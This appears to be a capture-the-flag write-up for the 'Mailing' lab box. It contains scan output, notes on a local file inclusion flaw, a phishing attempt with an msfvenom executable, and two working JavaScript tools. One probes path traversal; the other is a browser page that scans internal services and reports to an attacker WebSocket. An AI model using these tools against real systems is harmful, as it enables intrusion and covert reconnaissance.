Nmap scan report for 10.10.11.14
Host is up (0.047s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
5040/tcp open unknown
5985/tcp open wsman
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
51866/tcp open unknown
Let's get a vulnerability overview:
Interesting ports: 25 (SMTP), 80 (HTTP), 110 (POP3), 143 (IMAP), 445 (SMB), 587 (SMTP submission) and 5985 (WinRM, worth remembering once we hold credentials), plus possibly 5040 and 7680. On Windows 10/11 those last two are normally the Connected Devices Platform service and Windows Update Delivery Optimization rather than anything custom, whatever service name nmap guesses. The version scan below also shows that 25/tcp advertises AUTH LOGIN PLAIN with no STARTTLS while 587/tcp offers STARTTLS, so any client that authenticates on port 25 sends its credentials in the clear.
I tried some basic SMTP capability enumeration, then navigated to the web page on port 80:
I checked the instructions and tried to replicate them, but this "user" doesn't exist!
The download function is interesting though. In the meantime I ran feroxbuster too:
Let's see if we can do LFI through the download.php function!
From the open ports we can see that this is a Windows box, so:
Sweet! We can LFI!
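As an added example (not code from the original writeup), this is the kind of probe I would run against a download endpoint on a Windows host before trusting a single manual payload. It tries absolute paths, both path separators, one to six levels of `../`, and a URL-encoded copy of each (for servers that decode twice), and only counts a hit when the body really looks like the canary file, so a 200 with an error page is not mistaken for traversal. The endpoint `http://mailing.htb/download.php` and the parameter name `file` are assumptions, not taken from the page; it needs Node 18+ for the global `fetch`.

```javascript
// Added example, not code from the original writeup. Probes a download endpoint
// for path traversal on a Windows host using files that exist on every install.
// Assumptions (not from the page): the endpoint is http://mailing.htb/download.php
// and its parameter is called "file".

// Canary files and a check that the body really is that file, so a 200 with an
// error page is not counted as a hit.
const WINDOWS_CANARIES = {
  "Windows/win.ini": (body) => /\[fonts\]|16-bit app support/i.test(body),
  "Windows/System32/drivers/etc/hosts": (body) => /localhost/i.test(body),
};

// Traversal candidates for one canary: absolute path, 1..maxDepth levels of "..",
// both separators (Windows accepts "/" and "\"), and a URL-encoded copy of each
// so that a server which decodes twice still resolves a filtered "../".
function buildTraversalPayloads(relPath, maxDepth = 6) {
  const variants = new Set();
  for (const sep of ["/", "\\"]) {
    const rel = relPath.split("/").join(sep);
    variants.add(`C:${sep}${rel}`);
    for (let depth = 1; depth <= maxDepth; depth++) {
      variants.add(`..${sep}`.repeat(depth) + rel);
    }
  }
  for (const v of [...variants]) variants.add(encodeURIComponent(v));
  return [...variants];
}

// Build the request URL. URLSearchParams applies the single encoding a browser
// would, so the raw variant arrives decoded once and the pre-encoded variant
// arrives double-encoded.
function buildProbeUrl(baseUrl, param, payload) {
  const url = new URL(baseUrl);
  url.searchParams.set(param, payload);
  return url.toString();
}

// Try every variant and return the ones whose body matches the canary.
async function probeLfi(baseUrl, param, relPath, fetchImpl = globalThis.fetch) {
  const isCanary = WINDOWS_CANARIES[relPath];
  if (!isCanary) throw new Error(`no canary check for ${relPath}`);
  const hits = [];
  for (const payload of buildTraversalPayloads(relPath)) {
    try {
      const res = await fetchImpl(buildProbeUrl(baseUrl, param, payload));
      const body = await res.text();
      if (res.ok && isCanary(body)) hits.push({ payload, bytes: body.length });
    } catch {
      // A network error on one variant is not a finding; try the next one.
    }
  }
  return hits;
}

// Only runs when pointed at a target explicitly, e.g.
//   LFI_TARGET=http://mailing.htb/download.php LFI_PARAM=file node lfi-probe.js
if (typeof process !== "undefined" && process.env.LFI_TARGET) {
  probeLfi(process.env.LFI_TARGET, process.env.LFI_PARAM || "file", "Windows/win.ini")
    .then((hits) => console.log(JSON.stringify(hits, null, 2)));
}
```

The list of payloads that worked tells you how the handler normalises input (which depth, which separator, whether a second decode happens), which matters more than the first hit: the same variant is what you reuse for every later file read.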
I managed to get them working in Thunderbird as administrator@mailing.htb.
Now I am sending a malicious exe crafted with msfvenom to support (maya).
Hitting send...
Now we wait...
Realizing that no one opens our attachments, I tried a direct link in the mail instead:
Nobody opens the PowerShell either... Let's see; by elimination we need some phishing e-mail that will either launch a direct reverse shell through the browser, or, hmm..
No creds coming back :(
It turns out this works:
Using the same idea, I could enumerate some ports on the box:
I realized this was getting too involved; it has to be something easier, such as an Outlook exploit.
Nmap scan report for 10.10.11.14
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL TOP USER
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: RIGHTS=texkA0001 IDLE OK CHILDREN completed ACL CAPABILITY NAMESPACE IMAP4 IMAP4rev1 QUOTA SORT
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
587/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
993/tcp open ssl/imap hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: RIGHTS=texkA0001 IDLE OK CHILDREN completed ACL CAPABILITY NAMESPACE IMAP4 IMAP4rev1 QUOTA SORT
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
51866/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-12T17:41:34
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
2025-05-13 12:36:44,816 Connection established from ('10.10.11.14', 57048)
2025-05-13 12:36:44,996 Received message: {"type":"page_load","url":"http://10.10.16.9:9090/pl2.html","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"}
2025-05-13 12:36:45,121 Received message: {"type":"internal_fetch","url":"http://localhost/webmail/inbox","status":"success"}
2025-05-13 12:36:45,121 Received message: {"type":"internal_fetch","url":"http://localhost/admin/dashboard","status":"success"}
2025-05-13 12:36:45,121 Received message: {"type":"internal_fetch","url":"http://localhost/mail/inbox","status":"success"}
2025-05-13 12:36:45,301 connection open
2025-05-13 12:36:45,301 Connection established from ('10.10.11.14', 57056)
2025-05-13 12:36:45,384 Received message: {"type":"page_load","url":"http://10.10.16.9:9090/pl2.html","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"}
2025-05-13 12:36:45,426 Received message: {"type":"internal_fetch","url":"http://localhost/mail/inbox","status":"success"}
2025-05-13 12:36:45,426 Received message: {"type":"internal_fetch","url":"http://localhost/webmail/inbox","status":"success"}
2025-05-13 12:36:45,426 Received message: {"type":"internal_fetch","url":"http://localhost/admin/dashboard","status":"success"}
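The log above shows a victim browser (Edge 124 on the box) loading a page from our host and reporting `internal_fetch` results for localhost URLs. The following is an added example of such a page, not the writeup's own pl2.html (which the page does not show): it runs the probes from inside the victim's browser and sends results to an attacker WebSocket in the same message shape as the log. The listener address `ws://10.10.16.9:9091/` and the candidate URL list are assumptions made up for the example. The security-relevant detail is why every entry in the log reads `success`: with `mode: "no-cors"` the response is opaque, so the page cannot read a status or body, but the promise still rejects when nothing answers, which makes this a reachability check, not proof that a path exists.

```javascript
// Added example, not the writeup's own pl2.html (which the page does not show).
// Served from the attacker host and opened by a victim browser on the target, it
// makes the browser fetch internal URLs and reports what it saw over a WebSocket.
// Assumptions (not from the page): the listener ws://10.10.16.9:9091/ and the
// candidate URL list below are made up for the example.

const INTERNAL_TARGETS = [
  "http://localhost/webmail/inbox",
  "http://localhost/admin/dashboard",
  "http://localhost/mail/inbox",
  "http://localhost:5985/wsman",
  "http://localhost:8080/",
];

// One probe from inside the victim's browser. With mode:"no-cors" the response is
// opaque (no status, no body), but the promise still tells us whether an HTTP
// exchange happened: a closed port rejects with a TypeError, anything that
// answers HTTP resolves. A reachability check, not proof that the path exists.
async function probeInternal(url, fetchImpl = globalThis.fetch, timeoutMs = 3000) {
  const ctrl = new AbortController();
  const timer = setTimeout(() => ctrl.abort(), timeoutMs);
  try {
    await fetchImpl(url, { mode: "no-cors", cache: "no-store", signal: ctrl.signal });
    return { type: "internal_fetch", url, status: "success" };
  } catch (err) {
    return { type: "internal_fetch", url, status: err.name === "AbortError" ? "timeout" : "closed" };
  } finally {
    clearTimeout(timer);
  }
}

// Probe all targets in parallel (the identical timestamps in the log suggest the
// original did the same) and hand each result to the reporter.
async function scanInternal(urls, fetchImpl = globalThis.fetch, report = () => {}) {
  const results = await Promise.all(urls.map((u) => probeInternal(u, fetchImpl)));
  for (const r of results) report(r);
  return results;
}

// Browser bootstrap: only runs when loaded as a page, never under Node.
if (typeof document !== "undefined") {
  const ws = new WebSocket("ws://10.10.16.9:9091/"); // assumed attacker listener
  const send = (msg) => ws.send(JSON.stringify(msg));
  ws.addEventListener("open", async () => {
    send({ type: "page_load", url: location.href, userAgent: navigator.userAgent });
    await scanInternal(INTERNAL_TARGETS, globalThis.fetch, send);
    ws.close();
  });
}
```

Two caveats when reading the results. Browsers refuse to connect to a list of "bad" ports (25, 110 and 143 among them), so the mail services this box exposes cannot be probed this way and will always show as closed. Chromium's Private Network Access checks can also block or preflight requests from a page to loopback depending on version and context, so a `closed` result is not conclusive, while `success` is reliable: something on that port answered HTTP.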